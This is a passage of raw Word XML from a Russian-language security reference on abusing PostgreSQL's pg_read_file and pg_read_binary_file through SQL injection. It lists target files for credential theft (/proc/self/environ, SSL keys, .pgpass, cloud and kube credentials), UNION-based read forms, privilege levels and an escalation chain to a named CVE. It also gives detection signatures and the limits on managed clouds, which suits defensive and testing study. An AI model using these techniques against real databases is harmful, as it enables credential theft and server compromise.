        <w:t xml:space="preserve">) на ФС. Windows: эквивалент — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\NetworkService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или специальный postgres-аккаунт.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Configuration disclosure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postgresql.conf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pg_ident.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → понимание auth-модели (где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">trust</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md5</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scram-sha-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, какие сети whitelisted), расположение секретов, GUC-параметры безопасности (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">row_security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Secret compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — приоритеты целей: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`/proc/self/environ`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Linux) — env-vars backend-процесса; реально приходят сюда: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PGPASSWORD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DATABASE_URL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AWS_SECRET_ACCESS_KEY</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AWS_SESSION_TOKEN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GOOGLE_APPLICATION_CREDENTIALS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-путь, любые </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*_API_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> экспортированные в окружение postmaster. Реалистичнее чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.aws/credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что в managed/docker-средах файлов с креденшалами часто нет — всё в env. Файл NUL-separated, читать обязательно через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_read_binary_file('/proc/self/environ')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encode(..., 'escape')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, иначе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оборвётся на первом байте.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/etc/ssl/private/server.key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/var/lib/postgresql/.postgresql/postgresql.key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SSL-ключи (Payload C).</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~postgres/.pgpass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пароли к другим PG-инстансам.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~postgres/.aws/credentials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~postgres/.kube/config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — cross-system credentials.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Path discovery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/proc/self/maps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (адресное пространство postmaster для подготовки memory-corruption эксплойтов), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (список ОС-пользователей для подбора), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/os-release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (точная дистрибуция и версия для подбора kernel-CVE).</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pg_read_file(text path, bigint offset, bigint length)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> под капотом — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenTransientFile()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через ОС-API. Никакого sandboxing, никакого chroot.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Путь интерпретируется так: если начинается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&lt;drive&gt;:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на Windows) — абсолютный путь; иначе — относительный от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data_directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> кластера.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До PG 11 —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был только superuser-функцией, и принимал только относительные пути. PG 11 ввёл predefined role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которая снимает ограничение на абсолютные пути и убирает требование superuser.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pg_read_binary_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отличается возвращаемым типом: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Не падает на байтах вне валидного UTF-8 (важно для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/environ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, бинарных файлов, файлов в encoding отличном от server_encoding).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UNION-форма работает потому, что обе функции возвращают типы, приводимые к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сам по себе,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encode(..., 'base64'|'hex'|'escape')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Совмещение с типом исходной колонки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">name text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — тривиально.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Когда HTTP-ответ невидим (например, точка инъекции — error-only) — результат можно вынести через chain с 3.6.1/3.6.2 (см. «Связанные паттерны»).</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Три параллельных уровня доступности — каждый уровень открывает свой набор payload-ов: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Уровень (1) — любая роль, относительные пути в data_dir.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pg_read_file('PG_VERSION')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pg_read_file('postgresql.auto.conf')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pg_read_file('pg_logical/replorigin_checkpoint')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — работает без специальных привилегий. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Под капотом — функция работает как SECURITY DEFINER с проверкой пути:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> относительный путь канонизуется и валидируется на нахождение внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data_directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, попытка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абсолютного пути на этом уровне приводит к ошибке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">absolute path not allowed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Поэтому уровень (1) ограничен файлами data_dir — но даже там есть полезное: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PG_VERSION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postmaster.opts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (флаги запуска), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgresql.auto.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ALTER SYSTEM настройки).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Уровень (2) — `pg_read_server_files` predefined role + абсолютные пути.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GRANT pg_read_server_files TO appuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> снимает проверку пути — открываются абсолютные пути, чтение любых файлов с правами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Payload B и Payload C требуют этот уровень.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Уровень (3) — superuser.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Всё то же плюс возможность делегировать роль (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT pg_read_server_files TO ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) другим ролям. Для самой атаки этот уровень избыточен — Payload B/C работают на (2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Цепочка эскалации: уровень (1) даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PG_VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → известна major-версия PG → атакующий понимает, какие CVE из раздела 4 применимы (например, для PG &lt;17.1 можно цеплять CVE-2024-10979 plperl env RCE).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Модель привилегий — см. раздел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (predefined roles).</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от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application-роли</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практически всегда атака. Легитимное использование — только из admin-сессий и только для одного use case: чтение собственных логов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_read_file('log/postgresql-2026-05-25.log',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в UNION-конструкции — однозначная атака. В легитимном коде функция вызывается отдельным SELECT, не в UNION-ветке поверх произвольной таблицы.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Любое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_read_binary_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от application — атака; для web-приложений у этой функции нет легитимных use cases. Все легитимные применения — административные (резервное копирование SSL-сертификатов, дамп файлов конфигурации).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pg_stat_activity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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, содержащий одновременно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pg_read_binary_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и абсолютный путь начиная с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/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/root/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/home/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атака.</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14–17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (механика стабильна с PG 11; до PG 11 — только superuser + только относительные пути).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 `pg_read_server_files` структурно недоступна на всех major-провайдерах.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> На AWS RDS роль зарезервирована за внутренней инфраструктурой и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не выдаётся даже `rds_superuser`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; на Google Cloud SQL — аналогично,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на Supabase — только специальный service role при custom-конфигурации, по умолчанию закрыто. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака на managed-PG ограничена уровнем (1) — только относительные пути в data_dir, реалистичный максимум — `PG_VERSION` для fingerprinting.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Self-hosted (bare-metal, IaaS-VM, Kubernetes с own-managed PG) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">единственная среда, где доступны уровни (2) и (3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Детальный разбор по провайдерам — см.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как альтернативный file-read через OID large object (другая модель привилегий, другой API; работает там, где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недоступен).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3.6.1, 3.6.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
